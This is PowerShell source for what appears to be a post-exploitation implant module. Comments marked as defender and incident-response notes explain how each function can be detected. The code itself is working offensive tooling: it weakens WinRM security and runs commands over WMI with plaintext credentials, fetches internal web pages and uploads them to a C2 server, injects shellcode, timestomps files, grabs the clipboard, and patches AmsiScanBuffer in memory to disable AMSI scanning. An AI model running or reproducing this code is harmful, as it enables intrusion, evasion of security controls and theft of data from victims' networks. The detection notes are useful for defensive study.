# Defender note: each of these settings is a hardening regression worth alerting on —
# Basic + AllowUnencrypted sends credentials in the clear, TrustedHosts=* disables
# server authentication, and LocalAccountTokenFilterPolicy=1 enables remote admin with
# local accounts. A powershell.exe child of WmiPrvSE.exe on $computer (4688) is the
# execution-side indicator.
function EnableWinRM {
Param
(
[string]
$username,
[string]
$password,
[string]
$computer
)
Invoke-command -computer localhost -credential $getcreds -scriptblock { set-itemproperty -path "HKLM:\Software\Microsoft\Windows\CurrentVersion\Policies\System" -Name LocalAccountTokenFilterPolicy -Value 1 -Type Dword}
Invoke-Command -Computer localhost -Credential $getcreds -Scriptblock {Set-Item WSMan:localhost\client\trustedhosts -value * -force}
$command = "cmd /c powershell.exe -c Set-WSManQuickConfig -Force;Set-Item WSMan:\localhost\Service\Auth\Basic -Value $True;Set-Item WSMan:\localhost\Service\AllowUnencrypted -Value $True; Register-PSSessionConfiguration -Name Microsoft.PowerShell -Force"
# plaintext operator-supplied password -> PSCredential for the WMI call
$PSS = ConvertTo-SecureString $password -AsPlainText -Force
$getcreds = new-object system.management.automation.PSCredential $username,$PSS
Invoke-WmiMethod -Path Win32_process -Name create -ComputerName $computer -Credential $getcreds -ArgumentList $command
}
  546.  
# Remote counterpart of EnableWinRM's clean-up: via WMI on $computer it turns Basic
# auth and AllowUnencrypted back off, deletes the HTTP listener, stops the winrm
# service and sets it to Disabled.
# IR note: it does NOT revert the local LocalAccountTokenFilterPolicy or TrustedHosts
# changes made by EnableWinRM; those remain on the attacker-side host. Disabling winrm
# outright may also break legitimate management on $computer — a visible side effect.
function DisableWinRM {
Param
(
[string]
$username,
[string]
$password,
[string]
$computer
)
$command = "cmd /c powershell.exe -c Set-Item WSMan:\localhost\Service\Auth\Basic -Value $False;Set-Item WSMan:\localhost\Service\AllowUnencrypted -Value $False;winrm delete winrm/config/listener?address=*+transport=HTTP;Stop-Service -force winrm;Set-Service -Name winrm -StartupType Disabled"
$PSS = ConvertTo-SecureString $password -AsPlainText -Force
$getcreds = new-object system.management.automation.PSCredential $username,$PSS
Invoke-WmiMethod -Path Win32_process -Name create -ComputerName $computer -Credential $getcreds -ArgumentList $command
}
# Runs an arbitrary command on $computer through WMI Win32_Process.Create using
# explicit username/password credentials, and reports whether ReturnValue was 0.
# Defender note: remote WMI process creation shows up as WmiPrvSE.exe spawning the
# target command (4688) and as DCOM/WMI network logons (4624 type 3) from the source
# host; the failure text here also documents the operator's fallback (checking C$).
function WMICommand {
Param
(
[string]
$username,
[string]
$password,
[string]
$computer,
[string]
$command
)
$PSS = ConvertTo-SecureString $password -AsPlainText -Force
$getcreds = new-object system.management.automation.PSCredential $username,$PSS
$WMIResult = Invoke-WmiMethod -Path Win32_process -Name create -ComputerName $computer -Credential $getcreds -ArgumentList $command
# ReturnValue 0 = process created; non-zero codes are access/parameter errors
If ($WMIResult.Returnvalue -eq 0) {
    Write-Output "Executed WMI Command with Sucess: $Command `n"
} else {
    Write-Output "WMI Command Failed - Could be due to permissions or UAC is enabled on the remote host, Try mounting the C$ share to check administrative access to the host"
}
}
  583.  
# Process listing enriched with the owning user (from Win32_Process.GetOwner) and the
# architecture of each process — "x86" when wow64.dll is among its loaded modules,
# otherwise "x64" — then prints a table. The three branches repeat almost the same
# code for 64-bit, native 32-bit and WOW64 implants; only the first and third inspect
# modules (on a native 32-bit OS everything is x86).
# Operator use is presumably to pick an injection/migration target of the right bitness
# (see AutoMigrate); defensively, the WMI GetOwner call per process is a burst of
# Win32_Process queries visible in WMI-Activity tracing.
Function Get-ProcessFull {
 
[System.Diagnostics.Process[]] $processes64bit = @()
[System.Diagnostics.Process[]] $processes32bit = @()
 
 
# map process handle (PID as string) -> owner user name
$owners = @{}
gwmi win32_process |% {$owners[$_.handle] = $_.getowner().user}
 
$AllProcesses = @()
 
    # repeats the CheckArchitecture message for the 64-bit case
    if (Test-Win64) {
        Write-Output "64bit implant running on 64bit machine"
    }
 
if (Test-Win64) {
    foreach($process in get-process) {
    $modules = $process.modules
    foreach($module in $modules) {
        $file = [System.IO.Path]::GetFileName($module.FileName).ToLower()
        # presence of wow64.dll marks a 32-bit process on 64-bit Windows
        if($file -eq "wow64.dll") {
            $processes32bit += $process
            $pobject = New-Object PSObject | Select ID, StartTime, Name, Path, Arch, Username
            $pobject.Id = $process.Id
            $pobject.StartTime = $process.StartTime
            $pobject.Name = $process.Name
            $pobject.Path = $process.Path
            $pobject.Arch = "x86"
            $pobject.UserName = $owners[$process.Id.tostring()]
            $AllProcesses += $pobject
            break
        }
    }
 
    # anything not tagged x86 above is recorded as x64
    if(!($processes32bit -contains $process)) {
        $processes64bit += $process
        $pobject = New-Object PSObject | Select ID, StartTime, Name, Path, Arch, UserName
        $pobject.Id = $process.Id
        $pobject.StartTime = $process.StartTime
        $pobject.Name = $process.Name
        $pobject.Path = $process.Path
        $pobject.Arch = "x64"
        $pobject.UserName = $owners[$process.Id.tostring()]
        $AllProcesses += $pobject
    }
}
}
elseif ((Test-Win32) -and (-Not (Test-Wow64))) {
# native 32-bit OS: every process is x86, no module inspection needed
foreach($process in get-process) {
    $processes32bit += $process
    $pobject = New-Object PSObject | Select ID, StartTime, Name, Path, Arch, Username
    $pobject.Id = $process.Id
    $pobject.StartTime = $process.StartTime
    $pobject.Name = $process.Name
    $pobject.Path = $process.Path
    $pobject.Arch = "x86"
    $pobject.UserName = $owners[$process.Id.tostring()]
    $AllProcesses += $pobject
}
}
elseif ((Test-Win32) -and (Test-Wow64)) {
    # 32-bit implant on 64-bit OS: same module-based classification as the first branch
    foreach($process in get-process) {
    $modules = $process.modules
    foreach($module in $modules) {
        $file = [System.IO.Path]::GetFileName($module.FileName).ToLower()
        if($file -eq "wow64.dll") {
            $processes32bit += $process
            $pobject = New-Object PSObject | Select ID, StartTime, Name, Path, Arch, Username
            $pobject.Id = $process.Id
            $pobject.StartTime = $process.StartTime
            $pobject.Name = $process.Name
            $pobject.Path = $process.Path
            $pobject.Arch = "x86"
            $pobject.UserName = $owners[$process.Id.tostring()]
            $AllProcesses += $pobject
            break
        }
    }
 
    if(!($processes32bit -contains $process)) {
        $processes64bit += $process
        $pobject = New-Object PSObject | Select ID, StartTime, Name, Path, Arch, UserName
        $pobject.Id = $process.Id
        $pobject.StartTime = $process.starttime
        $pobject.Name = $process.Name
        $pobject.Path = $process.Path
        $pobject.Arch = "x64"
        $pobject.UserName = $owners[$process.Id.tostring()]
        $AllProcesses += $pobject
    }
}
} else {
    Write-Output "Unknown Architecture"
}
 
$AllProcesses|Select ID, UserName, Arch, Name, Path, StartTime | format-table -auto
 
}
# Lists TCP listening sockets (address, port, IPv4/IPv6) via
# IPGlobalProperties.GetActiveTcpListeners — a netstat -an substitute that needs no
# external binary. Only listeners are enumerated, not established connections.
Function Invoke-Netstat {                      
try {            
    $TCPProperties = [System.Net.NetworkInformation.IPGlobalProperties]::GetIPGlobalProperties()            
    $Connections = $TCPProperties.GetActiveTcpListeners()            
    foreach($Connection in $Connections) {            
        if($Connection.address.AddressFamily -eq "InterNetwork" ) { $IPType = "IPv4" } else { $IPType = "IPv6" }
        $OutputObj = New-Object -TypeName PSobject            
        $OutputObj | Add-Member -MemberType NoteProperty -Name "LocalAddress" -Value $connection.Address            
        $OutputObj | Add-Member -MemberType NoteProperty -Name "ListeningPort" -Value $Connection.Port            
        $OutputObj | Add-Member -MemberType NoteProperty -Name "IPV4Or6" -Value $IPType            
        $OutputObj            
    }            
           
} catch {            
    Write-Error "Failed to get listening connections. $_"            
}          
}
# Fetches $url from the victim's network position (e.g. an intranet page) and ships the
# HTML to the C2 as a "download-file web.html" upload — a way to read internal web
# content through the implant. Uses a bare System.Net.WebClient for the fetch (no proxy
# or header customisation), then the implant's Get-Webclient for the upload.
Function Get-Webpage {
    param ($url)
    $file = (New-Object System.Net.Webclient).DownloadString($url)|Out-String
    $ReadCommand = "download-file web.html"
    $ReadCommand = Encrypt-String $key $ReadCommand
    $bytes = [System.Text.Encoding]::UTF8.GetBytes($file)
    $base64 = [Convert]::ToBase64String($bytes)  
    $Output = Encrypt-String2 $key $base64
    $UploadBytes = getimgdata $Output
    (Get-Webclient -Cookie $ReadCommand).UploadData("$Server", $UploadBytes)|out-null
}
# If the host process is powershell.exe, injects the bitness-matching stage
# ($Shellcode64 / $Shellcode86, base64 blobs held outside this paste) via
# Inject-Shellcode (also external) so the implant moves out of the PowerShell process.
# Defender note: in-memory shellcode execution inside powershell.exe leaves private
# RWX/RX regions not backed by any image; memory scanners and EDR injection telemetry
# (VirtualAlloc/CreateThread from a scripting host) are the detection path.
Function AutoMigrate {
if (($p = Get-Process | ? {$_.id -eq $pid}).name -eq "powershell") {
    $t=$true
}
if ($t -and [IntPtr]::size -eq 8){
   Inject-Shellcode -Shellcode ([System.Convert]::FromBase64String($Shellcode64))
}
elseif (($t -and [IntPtr]::size -eq 4)) {
    Inject-Shellcode -x86 -Shellcode ([System.Convert]::FromBase64String($Shellcode86))
}
}
# Same as AutoMigrate but without the powershell.exe process-name check: always injects
# the stage matching the current pointer size.
Function AutoMigrate-Always {
if ([IntPtr]::size -eq 8){
   Inject-Shellcode -Shellcode ([System.Convert]::FromBase64String($Shellcode64))
}
elseif ([IntPtr]::size -eq 4) {
    Inject-Shellcode -x86 -Shellcode ([System.Convert]::FromBase64String($Shellcode86))
}
}
# Anti-forensics: sets a file's modified, accessed and created timestamps to $Date so it
# blends in with older files in a timeline.
# IR note: this only changes the $STANDARD_INFORMATION attribute; the MFT $FILE_NAME
# timestamps and USN journal records are untouched, so a mismatch between the two sets
# is the classic indicator of stomping.
Function TimeStomp($File, $Date) {
    $file=(gi $file)
    $file.LastWriteTime=$date;
    $file.LastAccessTime=$date;
    $file.CreationTime=$date;
}
# Returns the current text contents of the user's clipboard (collection of copied
# passwords/URLs). `-a` is the abbreviated -AssemblyName. Shadows the built-in
# Get-Clipboard cmdlet on PowerShell 5+.
Function Get-Clipboard {
    add-type -a system.windows.forms
    [windows.forms.clipboard]::GetText()
}
# Enumerates every service key under HKLM\System\CurrentControlSet\Services and prints
# name, ImagePath and Description — recon for service binary paths (and presumably
# for weak permissions on them) without calling sc.exe or Get-Service.
Function Get-AllServices {
    $Keys = Get-ChildItem HKLM:\System\CurrentControlSet\services; $Items = $Keys | Foreach-Object {Get-ItemProperty $_.PsPath }
    ForEach ($Item in $Items) {$n=$Item.PSChildName;$i=$Item.ImagePath;$d=$Item.Description; echo "Name: $n `nImagePath: $i `nDescription: $d`n"}
}
# Dumps the Windows Firewall rule set through the HNetCfg.FwPolicy2 COM object (works
# on PowerShell 2 without the NetSecurity module). With $path the rules are written to a
# CSV file on disk; otherwise they are returned to the caller.
Function Get-AllFirewallRules($path) {
    $Rules=(New-object -comObject HNetCfg.FwPolicy2).rules
    if ($path) {
        $Rules | export-csv $path -NoTypeInformation
    } else {
        $Rules
    }
}
# AMSI tampering for the current process: compiles a small P/Invoke wrapper with
# Add-Type, resolves AmsiScanBuffer inside the already-loaded amsi.dll, makes its first
# page writable (0x40 = PAGE_EXECUTE_READWRITE) and overwrites the function's first
# seven bytes so later scan calls return without scanning.
# Defender note: this is a well-known, signatured pattern — Add-Type source containing
# DllImport of GetProcAddress/LoadLibrary/VirtualProtect (visible in 4104 script block
# logs), csc.exe spawned by powershell.exe for the compile, and Defender's
# "AMSI tampering"/memory-patch telemetry all fire on it. Because the AMSI-presence
# check in CheckArchitecture runs at module load, the module itself is usually what
# AMSI sees first.
Function Unhook-AMSI {
   
    # C# P/Invoke declarations; the here-string body must stay at column 0
    $win32 = @"
using System.Runtime.InteropServices;
using System;
public class Win32 {
[DllImport("kernel32")]
public static extern IntPtr GetProcAddress(IntPtr hModule, string procName);
[DllImport("kernel32")]
public static extern IntPtr LoadLibrary(string name);
[DllImport("kernel32")]
public static extern bool VirtualProtect(IntPtr lpAddress, UIntPtr dwSize, uint flNewProtect, out uint lpflOldProtect
);
}
"@
Add-Type $win32
# LoadLibrary returns the existing module handle when amsi.dll is already loaded
$ptr = [Win32]::GetProcAddress([Win32]::LoadLibrary("amsi.dll"), "AmsiScanBuffer")
$b = 0
[Win32]::VirtualProtect($ptr, [UInt32]5, 0x40, [Ref]$b)
# 7-byte in-memory patch written over the start of AmsiScanBuffer
$buf = New-Object Byte[] 7
$buf[0] = 0x66; $buf[1] = 0xb8; $buf[2] = 0x01; $buf[3] = 0x00; $buf[4] = 0xc2; $buf[5] = 0x18; $buf[6] = 0x00;
[System.Runtime.InteropServices.Marshal]::Copy($buf, 0, $ptr, 7)
}